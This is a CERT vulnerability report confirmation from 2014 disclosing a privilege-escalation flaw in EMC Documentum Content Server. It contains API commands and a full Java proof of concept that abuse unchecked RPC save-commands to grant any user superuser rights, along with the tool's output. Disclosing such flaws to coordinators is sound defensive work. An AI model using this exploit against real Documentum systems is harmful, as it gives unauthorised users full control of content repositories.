Vulnerability Report Confirmation - [VRF#HUFG9EBA] Your vulnerability report has been successfully received. You may save or print this page for your own records. The Report Tracking ID assigned to this report is VRF#HUFG9EBA. Details of your report are listed below. If you have any questions or require additional information, please call the CERT Hotline at +1 412-268-7090 or send email to cert@cert.org . Please reference this Report Tracking ID: VRF#HUFG9EBA. Do not use the back button to submit another report. Click here instead. ------------------------------------------------------------------------ Vulnerability Report Name Andrey B. Panfilov Organization independent Email Address andrew@panfilov.tel Telephone Number Vulnerability Description EMC Documentum Content Server: any user is able to elevate privileges using inappropriate RPC save-commands. Content Server assumes that client sends correct RPC commands when saving objects having different object types (like SysObjSave for dm_sysobject, UserSave for dm_user, etc) and does not check input arguments for some RPC commands (SAVE_CONT_ATTRS, RelationSave, dmScopeConfigSave), so, user is able to modify any object in the system using inappropriate RPC save-command. Demonstration: API> retrieve,c,dm_user where user_name=USER ... 1101ffd780001911 API> set,c,l,user_privileges SET> 16 ... OK -- Here client sends SaveUser RPC-command -- and Content Server handles it properly - user does not have -- privileges to modify dm_user objects API> save,c,l ... [DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user (op1tp1) needs to have superuser or sysadmin privilege." API> revert,c,l, ... OK API> get,c,l,i_vstamp ... 20 -- -- Here we send RelationSave RPC-command against dm_user object -- API> apply,c,1101ffd780001911,RelationSave,OBJECT_TYPE,S,dm_user,IS_NEW_OBJECT,B, F,i_vstamp,I,20,user_privileges,I,16 ... q0 API> next,c,q0 ... OK API> get,c,q0,result ... 1 API> revert,c,l, ... OK -- -- Now attacker has superuser privileges -- API> get,c,l,user_privileges ... 16 ==========================================8<================================ ============================= import java.util.LinkedHashSet; import java.util.Set; import com.documentum.fc.client.DfClient; import com.documentum.fc.client.IDfSession; import com.documentum.fc.client.IDfSysObject; import com.documentum.fc.client.IDfUser; import com.documentum.fc.client.impl.objectmanager.TypeMechanics; import com.documentum.fc.common.DfException; import com.documentum.fc.common.DfList; import com.documentum.fc.common.DfLoginInfo; import com.documentum.fc.common.IDfList; /** * @author Andrey B. Panfilov */ public class Test { public static void main(String[] argv) throws Exception { String docbase = argv[0]; String userName = argv[1]; String password = argv[2]; IDfSession session = null; try { session = new DfClient().newSession(docbase, new DfLoginInfo( userName, password)); IDfUser user = session.getUser(null); if (user.isSuperUser() || user.isSystemAdmin()) { System.out.println("User " + userName + " has too wide privileges, choose different one"); System.exit(0); } Set saveMethods = new LinkedHashSet(); for (Object o : TypeMechanics.getAllInstances()) { saveMethods.add(((TypeMechanics) o).getSaveMethod()); } for (String method : saveMethods) { System.out.println(method + "\tis " + (checkDmMethod(session, method) ? "" : "not ") + "vulnerable for dm_method objects, " + "\tis " + (checkDmUser(session, method) ? "" : "not ") + "vulnerable for dm_user objects"); } } finally { if (session != null) { session.disconnect(); } } } public static Boolean checkDmUser(IDfSession session, String method) throws DfException { try { session.beginTrans(); IDfUser object = session.getUser(null); object.revert(); IDfList params = new DfList(new String[] {"OBJECT_TYPE", "IS_NEW_OBJECT", "i_vstamp", "user_privileges", }); IDfList types = new DfList(new String[] {"S", "B", "I", "I", }); IDfList values = new DfList(new String[] {"dm_user", "F", String.valueOf(object.getVStamp()), "16" }); session.apply(object.getObjectId().getId(), method, params, types, values); object.revert(); if (16 == object.getInt("user_privileges")) { return true; } else { return false; } } catch (DfException ex) { return false; } finally { session.abortTrans(); } } public static Boolean checkDmMethod(IDfSession session, String method) throws DfException { try { session.beginTrans(); IDfSysObject object = (IDfSysObject) session .getObjectByQualification("dm_method"); object.revert(); String methodVerb = String.valueOf(System.currentTimeMillis()); IDfList params = new DfList(new String[] {"OBJECT_TYPE", "IS_NEW_OBJECT", "i_vstamp", "method_verb", }); IDfList types = new DfList(new String[] {"S", "B", "I", "S", }); IDfList values = new DfList(new String[] {object.getTypeName(), "F", String.valueOf(object.getVStamp()), methodVerb }); session.apply(object.getObjectId().getId(), method, params, types, values); object.revert(); if (methodVerb.equals(object.getString("method_verb"))) { return true; } else { return false; } } catch (DfException ex) { return false; } finally { session.abortTrans(); } } } ==========================================>8================================ ============================= ==========================================8<================================ ============================= ~]$ java Test repo user password SAVE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects ContainmentSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects SAVE_CONT_ATTRS is vulnerable for dm_method objects, is vulnerable for dm_user objects SysObjSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects FolderSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects CabinetSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects AssemblySave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects SET_STORAGE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects UserSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects GroupSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects RegTableSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects RouterSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects InboxItemSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects SAVE_FORMAT is not vulnerable for dm_method objects, is not vulnerable for dm_user objects MAKE_DUMP is not vulnerable for dm_method objects, is not vulnerable for dm_user objects RelationSave is vulnerable for dm_method objects, is vulnerable for dm_user objects MAKE_FTINDEX is not vulnerable for dm_method objects, is not vulnerable for dm_user objects RelationTypeSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects DocbaseIdMapSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects ACLSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects PolicySave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects ReferenceSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects WflowSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects IPKGSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects WITEMSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects dmAuditTrailSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects AliasSetSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects LiteObjSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects PARTITION_SCHEME_SAVE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects dmScopeConfigSave is vulnerable for dm_method objects, is vulnerable for dm_user objects dmDisplayConfigSave is not vulnerable for dm_method objects, is not vulnerable for dm_user objects CLIENT_RIGHTS_DOMAIN_SAVE is not vulnerable for dm_method objects, is not vulnerable for dm_user objects ==========================================>8================================ ============================= Can we provide your name to the vendor? Yes Do you want to be publicly acknowledged? Yes Vendor Contact Status will not contact Vendor Name EMC Vendor Contact Name Vendor Contact Email Vendor Contact Telephone Number Vendor Tracking ID Additional Vendor Information Affected System Configurations All versions of EMC Documentum Content Server How was this vulnerability found? Is the vulnerability being exploited? Yes Is there a public exploit? No Vulnerability Impact Any user is able to gain superuser privileges (modify any objects, run any commands, etc) Comments Attached File Date 2014-04-25T08:22:44 Report Tracking ID VRF#HUFG9EBA CERT Tracking IDs ------------------------------------------------------------------------ Carnegie Mellon University ©2014 Carnegie Mellon University